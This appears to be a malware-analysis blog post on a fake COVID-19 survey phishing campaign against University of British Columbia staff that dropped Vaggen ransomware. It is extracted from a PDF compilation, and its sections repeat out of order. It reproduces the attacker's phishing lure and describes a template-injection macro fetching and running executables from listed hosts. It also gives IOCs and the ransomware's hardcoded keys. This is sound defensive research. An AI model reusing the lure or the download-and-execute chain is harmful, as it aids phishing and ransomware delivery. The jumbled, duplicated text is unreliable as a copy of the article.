Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1122 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1123 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1124 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1125 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1126 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1127 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1128 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1129 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1130 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1131 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1132 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1133 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1134 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1135 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1136 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1137 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1138 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1139 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1140 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1141 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1142 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1143 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1144 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1145 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1146 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1147 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1148 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1149 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1150 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1151 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1152 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1153 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1154 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1155 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin 